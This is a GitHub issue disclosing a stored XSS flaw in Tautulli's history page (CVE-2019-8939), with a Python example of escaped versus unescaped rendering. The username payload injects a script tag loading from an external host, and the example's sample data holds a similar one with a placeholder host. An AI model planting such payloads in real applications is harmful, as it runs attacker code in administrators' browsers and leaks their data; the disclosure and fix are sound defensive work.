
Insufficient username filtering in history.html allows XSS and data exfiltration #161

Closed
geeknik opened this issue Feb 19, 2019 · 1 comment

@geeknik
commented Feb 19, 2019

Version:
2.1.26

What you did?
I changed my Plex username to geeknik"><script src=https://zed.xss.ht></script>.

What happened?
Tautulli does not filter out JavaScript when reading usernames and when the admin visits the History page, the JavaScript is executed in the context of said admin.

Lines 112-128 are vulnerable:
https://github.com/Tautulli/Tautulli/blob/56a91de2c4ff0fdd8fbdff4dd7d7677bd16a4b28/data/interfaces/default/history.html#L112

Here we can see how it is reflected:

<label>
     <select name="history-user" id="history-user" class="btn" style="color: inherit;">
     <option value="">All Users</option>
     <option disabled="">────────────</option>
     <option value="xxx">user1</option><option value="xxx">user2</option><option value="xxx">user3</option><option value="xxx">user4</option><option value="xxx">DomitianX</option><option value="xxx">geeknik"&gt;<script src="https://zed.xss.ht"></script></option><option value="xxx">user5</option><option value="xxx">user6</option><option value="xxx">user7</option><option value="xxx">user8</option><option value="0">Local</option><option value="xxx">user9</option><option value="xxx">user10</option><option value="xxx">user11</option><option value="xxx">user12</option><option value="xxx">user13</option><option value="xxx">user14</option><option value="xxx">user15</option><option value="xxx">user16</option><option value="xxx">user17</option></select>
</label>

What you expected?
I didn't expect my friend's Plex server to leak a bunch of information at me.

How can we reproduce your issue?
Set up a Plex Media Server, install Tautulli, and create a normal Plex user account to consume media. Change the user account name to something containing JavaScript. Visit the Tautulli History page.
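The missing step the report points at is output encoding of the username before it is placed in the option markup. As an added example (not Tautulli's code), written in Python because that is the project's language, this renders the same select list twice, once interpolating the friendly name verbatim as history.html did, once HTML-escaping it; the user list and its script URL are constructed placeholders, not values from the report.

```python
import html
from typing import Iterable, Mapping

# Constructed sample data modelled on the report: one user's friendly name
# carries markup that closes the attribute context and injects a script tag.
# The host is a placeholder, not the one in the report.
SAMPLE_USERS = [
    {"user_id": 1, "friendly_name": "user1"},
    {"user_id": 2, "friendly_name": 'geeknik"><script src=https://attacker.invalid></script>'},
    {"user_id": 0, "friendly_name": "Local"},
]


def render_options_unescaped(users: Iterable[Mapping]) -> str:
    """Mirrors the flaw: the friendly name is interpolated into HTML verbatim,
    so any '<' or '"' in it becomes live markup in the admin's browser."""
    return "".join(
        f'<option value="{u["user_id"]}">{u["friendly_name"]}</option>'
        for u in users
    )


def render_options_escaped(users: Iterable[Mapping]) -> str:
    """Hardened rendering: every attacker-influenced value is escaped with
    quote=True so '<', '>', '&', '"' and "'" are turned into entities before
    they reach the markup; the username still displays unchanged."""
    return "".join(
        f'<option value="{html.escape(str(u["user_id"]), quote=True)}">'
        f'{html.escape(u["friendly_name"], quote=True)}</option>'
        for u in users
    )


def contains_live_tag(markup: str, tag: str = "script") -> bool:
    """Detection helper for a test or a template audit: True if an unescaped
    opening <tag appears anywhere in the rendered output."""
    return f"<{tag}" in markup.lower()


if __name__ == "__main__":
    print("unescaped leaks a live tag:", contains_live_tag(render_options_unescaped(SAMPLE_USERS)))
    print("escaped leaks a live tag:  ", contains_live_tag(render_options_escaped(SAMPLE_USERS)))
```

In a Mako template such as history.html the same effect comes from the built-in `| h` filter on the interpolation, applied to every value that originates from Plex rather than from Tautulli itself.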

@geeknik (Author)

commented Feb 19, 2019

CVE-2019-8939 has been assigned to this flaw by MITRE.
